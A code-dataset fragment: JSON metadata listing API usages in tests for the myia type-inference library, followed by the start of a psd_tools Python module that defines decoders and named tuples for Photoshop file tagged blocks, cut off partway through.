{"api_name": "myia.infer.InferenceError", "line_number": 1515, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.switch", "line_number": 1556, "usage_type": "call"}, {"api_name": "common.B", "line_number": 1522, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1522, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1523, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1523, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1524, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1524, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1524, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1524, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1525, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1525, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1526, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1526, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1531, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1531, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1534, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1539, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1542, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1544, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1549, "usage_type": "name"}, {"api_name": "common.Thing", "line_number": 1569, "usage_type": "call"}, {"api_name": "common.Thing", "line_number": 1570, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.switch", "line_number": 1571, "usage_type": "call"}, {"api_name": "common.B", "line_number": 1560, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1560, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_cast", "line_number": 1587, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1577, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1578, "usage_type": "name"}, {"api_name": "common.i16", "line_number": 1578, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1579, "usage_type": "name"}, {"api_name": "common.i16", "line_number": 1579, "usage_type": "name"}, {"api_name": "common.f16", "line_number": 1580, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 1580, "usage_type": "name"}, {"api_name": "common.f16", "line_number": 1581, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1581, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1581, "usage_type": "name"}, {"api_name": "common.f16", "line_number": 1582, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1582, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1582, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1583, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 1583, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1583, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_to_array", "line_number": 1596, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1590, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1590, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1591, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 1591, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1592, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1593, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1593, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1593, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1594, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_to_scalar", "line_number": 1605, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1599, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1600, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1601, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1602, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1603, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.broadcast_shape", "line_number": 1617, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1609, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1609, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1610, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1610, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1611, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1611, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1612, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1612, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1612, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1612, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1613, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1613, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1613, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1613, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1614, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1614, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1621, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1621, "usage_type": "name"}, {"api_name": "common.F", "line_number": 1622, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1622, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1622, "usage_type": "name"}, {"api_name": "common.F", "line_number": 1623, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1623, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1623, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1623, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 1629, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 1629, "usage_type": "attribute"}, {"api_name": "common.F", "line_number": 1631, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1631, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1640, "usage_type": "name"}, {"api_name": "common.i16", "line_number": 1640, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1653, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1653, "usage_type": "name"}, {"api_name": "common.mysum", "line_number": 1672, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1667, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1668, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1668, "usage_type": "name"}, {"api_name": "myia.ir.MultitypeGraph", "line_number": 1675, "usage_type": "call"}, {"api_name": "common.ai64", "line_number": 1678, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1685, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1685, "usage_type": "argument"}, {"api_name": "common.af64", "line_number": 1683, "usage_type": "argument"}, {"api_name": "common.ai64", "line_number": 1690, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 1691, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1692, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1692, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1696, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1697, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1710, "usage_type": "name"}, {"api_name": "myia.pipeline.pipeline_function", "line_number": 1707, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1718, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1719, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1719, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1724, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1732, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add.inferred", "line_number": 1733, "usage_type": "attribute"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1733, "usage_type": "name"}, {"api_name": "common.F", "line_number": 1733, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1733, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1733, "usage_type": "name"}, {"api_name": "myia.pipeline.pipeline_function", "line_number": 1729, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1745, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1749, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 1753, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1753, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1756, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1756, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 1764, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1764, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1767, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1778, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1779, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1780, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1780, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1781, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1781, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1782, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1782, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1782, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1783, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1783, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1791, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1792, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1793, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1800, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1801, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1801, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1811, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1812, "usage_type": "name"}, {"api_name": "common.af32", "line_number": 1813, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1826, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1827, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1835, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1835, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1843, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1844, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1857, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 1857, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1859, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1859, "usage_type": "argument"}, {"api_name": "common.f16", "line_number": 1853, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 1853, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1853, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1867, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1867, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1870, "usage_type": "call"}, {"api_name": "common.Point_t", "line_number": 1871, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1871, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1874, "usage_type": "argument"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1874, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1883, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1883, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1886, "usage_type": "call"}, {"api_name": "common.Point", "line_number": 1907, "usage_type": "call"}, {"api_name": "common.Point", "line_number": 1908, "usage_type": "call"}, {"api_name": "common.Point", "line_number": 1909, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1895, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1895, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1896, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1896, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1899, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1902, "usage_type": "argument"}, {"api_name": "myia.dshape.ClassShape", "line_number": 1903, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1903, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1912, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1912, "usage_type": "name"}, {"api_name": "myia.hypermap.HyperMap", "line_number": 1917, "usage_type": "call"}, {"api_name": "myia.hypermap.HyperMap", "line_number": 1918, "usage_type": "call"}, {"api_name": "myia.dtype.Array", "line_number": 1918, "usage_type": "name"}, {"api_name": "myia.dtype.Class", "line_number": 1918, "usage_type": "name"}, {"api_name": "myia.hypermap.HyperMap", "line_number": 1919, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1949, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1924, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1925, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1926, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1927, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1927, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1928, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1928, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1928, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1929, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1929, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1929, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1929, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1930, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1930, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1930, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1931, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1932, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1933, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1933, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1933, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1934, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1934, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1934, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1935, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1940, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1945, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1958, "usage_type": "argument"}, {"api_name": "common.T", "line_number": 1954, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1954, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1954, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1954, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1969, "usage_type": "argument"}, {"api_name": "myia.infer.InferenceError", "line_number": 1964, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1965, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1965, "usage_type": "name"}, {"api_name": "myia.composite.hyper_add", "line_number": 1994, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1974, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1975, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1976, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1977, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1977, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1977, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1978, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1979, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 1980, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1985, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1990, "usage_type": "name"}, {"api_name": "myia.composite.zeros_like", "line_number": 2018, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1999, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2000, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 2001, "usage_type": "name"}, {"api_name": "common.T", "line_number": 2002, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 2002, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2002, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 2003, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 2004, "usage_type": "name"}, {"api_name": "common.af32", "line_number": 2005, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 2010, "usage_type": "call"}, {"api_name": "myia.composite.zeros_like", "line_number": 2025, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 2021, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 2021, "usage_type": "name"}, {"api_name": "myia.composite.list_map", "line_number": 2039, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 2030, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 2030, "usage_type": "name"}, {"api_name": "common.T", "line_number": 2030, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 2031, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2031, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2031, "usage_type": "name"}, {"api_name": "myia.composite.list_map", "line_number": 2053, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 2044, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 2045, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 2045, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2045, "usage_type": "name"}, {"api_name": "myia.composite.list_map", "line_number": 2062, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 2056, "usage_type": "name"}, {"api_name": "myia.utils.newenv", "line_number": 2073, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.env_setitem", "line_number": 2074, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.embed", "line_number": 2074, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.env_getitem", "line_number": 2075, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.embed", "line_number": 2075, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 2067, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2068, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 2068, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2068, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2069, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 2069, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2069, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.J", "line_number": 2088, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.J", "line_number": 2089, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 2080, "usage_type": "name"}, {"api_name": "common.T", "line_number": 2080, "usage_type": "name"}, {"api_name": "myia.dtype.JTagged", "line_number": 2080, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 2080, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2081, "usage_type": "name"}, {"api_name": "common.T", "line_number": 2081, "usage_type": "name"}, {"api_name": "myia.dtype.JTagged", "line_number": 2081, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 2081, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.Jinv", "line_number": 2103, "usage_type": "call"}, {"api_name": "myia.dtype.JTagged", "line_number": 2097, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2097, "usage_type": "name"}, {"api_name": "myia.dtype.JTagged", "line_number": 2098, "usage_type": "name"}, {"api_name": "common.L", "line_number": 2098, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2098, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2099, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2099, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.Jinv", "line_number": 2120, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.J", "line_number": 2120, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 2108, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2109, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 2110, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.Jinv", "line_number": 2128, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 2124, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2124, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_reduce", "line_number": 2142, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.array_to_scalar", "line_number": 2143, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.J", "line_number": 2144, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.Jinv", "line_number": 2145, "usage_type": "call"}, {"api_name": "common.T", "line_number": 2133, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 2133, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 2133, "usage_type": "name"}, {"api_name": "common.af32", "line_number": 2133, "usage_type": "name"}, {"api_name": "myia.dshape.TupleShape", "line_number": 2137, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 2137, "usage_type": "name"}, {"api_name": "myia.composite.grad", "line_number": 2157, "usage_type": "call"}, {"api_name": "common.f32", "line_number": 2150, "usage_type": "name"}, {"api_name": "common.i16", "line_number": 2151, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_cast", "line_number": 2169, "usage_type": "call"}, {"api_name": "common.f16", "line_number": 2169, "usage_type": "argument"}, {"api_name": "myia.composite.grad", "line_number": 2171, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 2162, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 2163, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2164, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_reduce", "line_number": 2184, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 2184, "usage_type": "argument"}, {"api_name": "myia.composite.grad", "line_number": 2186, "usage_type": "call"}, {"api_name": "common.af16", "line_number": 2176, "usage_type": "name"}]} +{"seq_id": "233788879", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals, print_function\nimport warnings\nimport collections\nimport io\n\nfrom psd_tools.constants import TaggedBlock, SectionDivider, ColorMode\nfrom psd_tools.decoder.actions import (decode_descriptor, UnknownOSType,\n RawData)\nfrom psd_tools.utils import (read_fmt, unpack, read_unicode_string,\n read_pascal_string)\nfrom psd_tools.decoder import decoders, layer_effects\nfrom psd_tools.decoder.color import decode_color\nfrom psd_tools.decoder.path import decode_path_resource\nfrom psd_tools.reader.layers import Block\nfrom psd_tools.debug import pretty_namedtuple\nfrom psd_tools.decoder import engine_data\n\n_tagged_block_decoders, register = decoders.new_registry()\n\n_tagged_block_decoders.update({\n TaggedBlock.BLEND_CLIPPING_ELEMENTS: decoders.boolean(\"I\"),\n TaggedBlock.BLEND_INTERIOR_ELEMENTS: decoders.boolean(\"I\"),\n TaggedBlock.BLEND_FILL_OPACITY: decoders.single_value(\"4B\"),\n TaggedBlock.KNOCKOUT_SETTING: decoders.boolean(\"I\"),\n TaggedBlock.UNICODE_LAYER_NAME: decoders.unicode_string,\n TaggedBlock.LAYER_ID: decoders.single_value(\"I\"), # XXX: there are more fields in docs, but they seem to be incorrect\n TaggedBlock.EFFECTS_LAYER: layer_effects.decode,\n TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO: layer_effects.decode_object_based,\n TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO_V0: layer_effects.decode_object_based,\n TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO_V1: layer_effects.decode_object_based,\n TaggedBlock.USING_ALIGNED_RENDERING: decoders.boolean(\"I\"),\n TaggedBlock.LAYER_VERSION: decoders.single_value(\"I\"),\n TaggedBlock.TRANSPARENCY_SHAPES_LAYER: decoders.single_value(\"4B\"),\n TaggedBlock.LAYER_MASK_AS_GLOBAL_MASK: decoders.single_value(\"4B\"),\n TaggedBlock.VECTOR_MASK_AS_GLOBAL_MASK: decoders.single_value(\"4B\"),\n})\n\n\nSolidColorSetting = pretty_namedtuple('SolidColorSetting', 'version data')\nPatternFillSetting = pretty_namedtuple('PatternFillSetting', 'version data')\nGradientFillSetting = pretty_namedtuple('GradientFillSetting', 'version data')\nBrightnessContrast = pretty_namedtuple('BrightnessContrast',\n 'brightness contrast mean lab')\nLevelsSettings = pretty_namedtuple('LevelsSettings', 'version data')\nLevelRecord = pretty_namedtuple('LevelRecord', 'input_floor input_ceiling '\n 'output_floor output_ceiling gamma')\nCurvesSettings = pretty_namedtuple(\n 'CurvesSettings', 'version count data extra')\nCurvesExtraMarker = pretty_namedtuple(\n 'CurvesExtraMarker', 'tag version count data')\nCurveData = pretty_namedtuple('CurveData', 'channel points')\nExposure = pretty_namedtuple('Exposure', 'version exposure offset gamma')\nVibrance = pretty_namedtuple('Vibrance', 'descriptor_version descriptor')\nHueSaturation = pretty_namedtuple(\n 'HueSaturation', 'version enable_colorization colorization master items')\nHueSaturationData = pretty_namedtuple('HueSaturationData', 'range settings')\nColorBalance = pretty_namedtuple(\n 'ColorBalance', 'shadows midtones highlights preserve_luminosity')\nBlackWhite = pretty_namedtuple('BlackWhite', 'descriptor_version descriptor')\nPhotoFilter = pretty_namedtuple(\n 'PhotoFilter',\n 'version xyz color_space color_components density preserve_luminosity')\nChannelMixer = pretty_namedtuple(\n 'ChannelMixer', 'version monochrome mixer_settings')\nColorLookup = pretty_namedtuple(\n 'ColorLookup', 'version, descriptor_version descriptor')\nInvert = pretty_namedtuple('Invert', '')\nPosterize = pretty_namedtuple('Posterize', 'value')\nThreshold = pretty_namedtuple('Threshold', 'value')\nSelectiveColor = pretty_namedtuple('SelectiveColor', 'version, method items')\nPattern = pretty_namedtuple('Pattern', 'version image_mode point name '\n 'pattern_id color_table data')\nVirtualMemoryArrayList = pretty_namedtuple(\n 'VirtualMemoryArrayList', 'version rectangle channels')\nVirtualMemoryArray = pretty_namedtuple(\n 'VirtualMemoryArray', 'is_written depth rectangle pixel_depth '\n 'compression data')\nGradientSettings = pretty_namedtuple(\n 'GradientSettings',\n 'version reversed dithered name color_stops transparency_stops expansion '\n 'interpolation length mode random_seed show_transparency '\n 'use_vector_color roughness color_model min_color max_color')\nColorStop = pretty_namedtuple('ColorStop', 'location midpoint mode color')\nTransparencyStop = pretty_namedtuple(\n 'TransparencyStop',\n 'location midpoint opacity expansion interpolation length mode')\nExportData = pretty_namedtuple('ExportData', 'version data')\nVectorStrokeSetting = pretty_namedtuple('VectorStrokeSetting', 'version data')\nVectorStrokeContentSetting = pretty_namedtuple(\n 'VectorStrokeContentSetting', 'key version data')\nMetadataItem = pretty_namedtuple('MetadataItem', 'key copy_on_sheet_duplication descriptor_version data')\nProtectedSetting = pretty_namedtuple('ProtectedSetting', 'transparency, composite, position')\nTypeToolObjectSetting = pretty_namedtuple('TypeToolObjectSetting',\n 'version xx xy yx yy tx ty text_version descriptor1_version text_data '\n 'warp_version descriptor2_version warp_data left top right bottom')\nContentGeneratorExtraData = pretty_namedtuple(\n 'ContentGeneratorExtraData', 'descriptor_version descriptor')\nUnicodePathName = pretty_namedtuple(\n 'UnicodePathName', 'descriptor_version descriptor')\nAnimationEffects = pretty_namedtuple(\n 'AnimationEffects', 'descriptor_version descriptor')\nFilterMask = pretty_namedtuple('FilterMask', 'color opacity')\nVectorOriginationData = pretty_namedtuple('VectorOriginationData', 'version descriptor_version data')\nVectorMaskSetting = pretty_namedtuple(\n 'VectorMaskSetting','version invert not_link disable path')\nPixelSourceData = pretty_namedtuple('PixelSourceData', 'version data')\nArtboardData = pretty_namedtuple('ArtboardData', 'version data')\nUserMask = pretty_namedtuple('UserMask', 'color opacity flag')\nFilterEffects = pretty_namedtuple(\n 'FilterEffects',\n 'uuid version rectangle depth max_channels channels extra_data')\nFilterEffectChannel = pretty_namedtuple(\n 'FilterEffectChannel', 'is_written compression data')\nPlacedLayerObsolete = pretty_namedtuple(\n 'PlacedLayerObsolete',\n 'type version uuid page total_pages anti_alias layer_type transformation '\n 'warp')\nWarpInformation = pretty_namedtuple(\n 'WarpInformation', 'version descriptor_version descriptor')\n\n\nclass Divider(collections.namedtuple('Divider', 'block type key')):\n def __repr__(self):\n return \"Divider(%s %r %s, %s)\" % (\n self.block, self.type, SectionDivider.name_of(self.type), self.key)\n\n\ndef decode(tagged_blocks, version):\n \"\"\"\n Replaces \"data\" attribute of a blocks from ``tagged_blocks`` list\n with parsed data structure if it is known how to parse it.\n \"\"\"\n return [parse_tagged_block(block, version) for block in tagged_blocks]\n\n\ndef parse_tagged_block(block, version=1, **kwargs):\n \"\"\"\n Replaces \"data\" attribute of a block with parsed data structure\n if it is known how to parse it.\n \"\"\"\n if not TaggedBlock.is_known(block.key):\n warnings.warn(\"Unknown tagged block (%s)\" % block.key)\n\n decoder = _tagged_block_decoders.get(block.key, lambda data, **kwargs: data)\n return 